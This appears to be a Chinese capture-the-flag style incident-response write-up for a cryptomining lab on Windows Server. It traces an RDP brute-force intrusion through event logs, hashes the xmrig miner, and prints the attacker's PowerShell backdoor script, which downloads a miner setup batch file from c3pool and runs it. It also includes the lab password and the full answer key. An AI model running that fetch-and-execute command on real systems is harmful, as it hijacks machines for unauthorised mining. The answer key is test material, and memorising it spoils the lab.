应急响应靶机练习-WindowsServer挖矿

一、挑战内容

1. 攻击者的IP地址
2. 攻击者开始攻击的时间
3. 攻击者攻击的端口
4. 挖矿程序的md5
5. 后门脚本的md5
6. 矿池地址
7. 钱包地址
8. 攻击者是如何攻击进入的

二、环境准备

账号密码：Administrator / zgsf@123

使用vmware直接打开即可，登录后会提示安装vmwaretool，安装后图形化界面会好看很多，重启后后生效。

三、开始

1.挑战一

没有发现该服务器存在web服务，可能是通过rdp远程登录进来的，需要查看日志确认。

win+r，然后输入eventvwr打开日志

查看安全日志

筛选id为4625的事件（账户登录失败，检测是否存在暴力破解）

PS：
系统日志（System）
6005：表示系统日志服务已启动，通常用于判断系统是否正常启动。
6006：表示系统日志服务已停止，通常用于判断系统是否正常关机。
6009：表示系统非正常关机，例如通过按 Ctrl+Alt+Delete 强制关机。
41：表示系统在未正常关机的情况下重新启动，常见于意外断电或系统崩溃。
1074：记录系统关机、重启的时间及原因。
7045：表示服务创建成功。
7030：表示服务创建失败。
安全日志（Security）
4624：账户成功登录。
4625：账户登录失败，可用于检测暴力破解攻击。
4634：账户被注销。
4647：用户发起注销。
4648：试图使用明确的凭证登录，可用于查看远程登录相关信息，如远程登录的 IP 地址。
4672：授予特殊权限。
4720：创建用户。
4726：删除用户。
4732：将成员添加到启用安全的本地组中。
4733：将成员从启用安全的本地组中移除。
应用程序日志（Application）
1116：反恶意软件平台检测到恶意软件或其他可能不需要的软件。
其他日志
104：记录所有审计日志清除事件。
4199：TCP/IP 地址冲突。
4800：工作站被锁定。
4801：工作站被解锁。

发现短时间内存在大量登录失败记录，确认存在暴力破解行为

点进去可以发现攻击者IP为192.168.115.131（ps：20:17分的记录没看到 ip，应该不是破解的日志，要看25分的记录）

 

2.挑战二 

开始攻击的时间就是上面第一条失败的记录，2024/5/21 20:25:22

3.挑战三 

筛选id为4624的事件（登录成功），发现攻击者ip成功登录

结合端口开放情况，基本可以判定攻击者对rdp端口进行暴力破解，因此攻击的端口为3389

4.挑战四 

如果存在挖矿程序，cpu、gpu、内存啥的使用率会比较高，crtl+shift+esc打开任务管理器查看使用情况，发现存在一个程序占用内存较多（ps:这个的占用情况跟设置的虚拟机配置有关，关注相对占比即可，无需关注绝对占比）

查看详情，发现创建时间就是攻击者成功登录后几分钟

查询后确认这就是挖矿程序

使用命令计算MD5值，为a79d49f425f95e70ddf0c68c18abc564

C:\Users\Administrator>cd C:\Users\Administrator\c3pool

C:\Users\Administrator\c3pool>dir
 驱动器 C 中的卷没有标签。
 卷的序列号是 440A-D872

 C:\Users\Administrator\c3pool 的目录

2024/05/21  20:32    <DIR>          .
2025/03/16  15:04    <DIR>          ..
2025/03/16  15:10             4,688 config.json
2024/05/21  20:32             2,726 config_background.json
2024/05/21  20:32               337 miner.bat
2017/04/26  15:14           368,640 nssm.exe
2025/03/16  15:05                 0 stderr
2025/03/16  15:05                 0 stdout
2024/04/29  17:46            14,544 WinRing0x64.sys
2024/04/29  17:46         6,497,280 xmrig.exe
2025/03/16  16:22            27,018 xmrig.log
               9 个文件      6,915,233 字节
               2 个目录 46,483,034,112 可用字节

C:\Users\Administrator\c3pool>certutil -hashfile xmrig.exe MD5
MD5 的 xmrig.exe 哈希:
a79d49f425f95e70ddf0c68c18abc564
CertUtil: -hashfile 命令成功完成。

5.挑战五 

 后门脚本可能在计划任务中，输入taskschd.msc，查看计划任务程序

 在systemTesst中发现该任务启动一个奇怪的bat文件

打开发现里面就是后门脚本

powershell -Command "$wc = New-Object System.Net.WebClient; 
$tempfile = [System.IO.Path]::GetTempFileName(); 
$tempfile += '.bat'; $wc.DownloadFile('https://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.bat', $tempfile); 
& $tempfile 4APXVhukGNiR5kqqVC7jwiVaa5jDxUgPohEtAyuRS1uyeL6K1LkkBy9SKx5W1M7gYyNneusud6A8hKjJCtVbeoFARuQTu4Y; 
Remove-Item -Force $tempfile"

使用相同的方法计算MD5，值为8414900f4c896964497c2cf6552ec4b9

C:\Users\Administrator\AppData>dir
 驱动器 C 中的卷没有标签。
 卷的序列号是 440A-D872

 C:\Users\Administrator\AppData 的目录

2025/03/16  15:04    <DIR>          ..
2025/03/16  15:04    <DIR>          Local
2024/05/21  19:53    <DIR>          LocalLow
2024/05/21  20:17    <DIR>          Roaming
2024/05/21  20:30               374 systems.bat
               1 个文件            374 字节
               4 个目录 46,480,056,320 可用字节

C:\Users\Administrator\AppData>certutil -hashfile systems.bat MD5
MD5 的 systems.bat 哈希:
8414900f4c896964497c2cf6552ec4b9
CertUtil: -hashfile 命令成功完成。

C:\Users\Administrator\AppData>

6.挑战六 、挑战七

 前面发现挖矿程序的目录在c3pool，进入目录查看发现存在config配置文件

  

发现可疑字段

参数配置说明

1. 网络相关参数
-o 或 --url：指定挖矿池的 URL。
-u 或 --user：挖矿池的用户名，通常是你的钱包地址。
-p 或 --pass：挖矿池的密码，通常为 x 或其他自定义密码。
--tls：启用 SSL/TLS 支持（需要挖矿池支持）。
--nicehash：启用 NiceHash 模式。
--rig-id：为挖矿池统计设置的 ID（需要挖矿池支持）。
2. 挖矿算法相关参数
-a 或 --algo：指定挖矿算法，如 cryptonight、randomx 等。
--coin：指定挖矿的加密货币，而不是直接指定算法。
--variant：指定算法的变体，例如 -1 表示自动检测，0 表示旧版本算法，1 表示新版本算法。
3. CPU 挖矿相关参数
--no-cpu：禁用 CPU 挖矿。
-t 或 --threads：指定 CPU 线程数。
--cpu-priority：设置进程优先级（0 表示空闲，2 表示正常，5 表示最高）。
--cpu-affinity：设置进程与 CPU 核心的亲和性。
--randomx-no-numa：禁用 RandomX 的 NUMA 支持。
4. 其他配置参数
--donate-level：设置捐赠级别，默认为 5%。
--retries：在切换到备份服务器之前重试的次数。
--retry-pause：重试之间的暂停时间。
--print-time：每隔多少秒打印一次哈希率报告。
--log-file：将所有输出记录到指定的日志文件。

所以矿池地址为auto.c3pool.org 

 钱包地址为4APXVhukGNiR5kqqVC7jwiVaa5jDxUgPohEtAyuRS1uyeL6K1LkkBy9SKx5W1M7gYyNneusud6A8hKjJCtVbeoFARuQTu4Y

7.挑战八 

由上面的分析，攻击者使用暴力破解rdp3389进行远程连接进入。

四、验证

运行桌面的程序

吐槽：这个程序如果输入一次错误，直接退出了，又得重新从头输入一遍，还是MD5需要输入大写，也没有明确的提示。

欢迎使用 知攻善防实验室 解题系统
在解题之前，请先确保您得到以下答案：
1.攻击者开始攻击的时间
2.攻击者的ip地址
3.攻击者攻击的端口
4.挖矿程序的md5
5.后门脚本的md5
6.矿池地址(仅域名)
7.攻击者的钱包地址
8.攻击者是如何攻击进入的
你准备好了吗？(y/n):y
请输入攻击者开始攻击的时间(格式:xxxx-xx-xx xx:xx:xx):2024-05-21 20:25:22
正确！！！
请输入攻击者的IP地址:192.168.115.131
正确！！！
请输入攻击者攻击的端口(格式:xxxx):3389
正确！！！
请输入挖矿程序的md5:A79D49F425F95E70DDF0C68C18ABC564
正确！！！
请输入后门程序md5:8414900F4C896964497C2CF6552EC4B9
正确！！！
请输入矿池地址(仅顶级域名):c3pool.org
正确！！！
请输入攻击者钱包地址:4APXVhukGNiR5kqqVC7jwiVaa5jDxUgPohEtAyuRS1uyeL6K1LkkBy9SKx5W1M7gYyNneusud6A8hKjJCtVbeoFARuQTu4Y
正确！！！
请输入攻击者是如何攻击进入的(格式:XXXX):暴力破解
正确！！！
恭喜你，您已成功攻克此靶机
恭喜你，您已成功攻克此靶机
恭喜你，您已成功攻克此靶机
恭喜你，您已成功攻克此靶机
恭喜你，您已成功攻克此靶机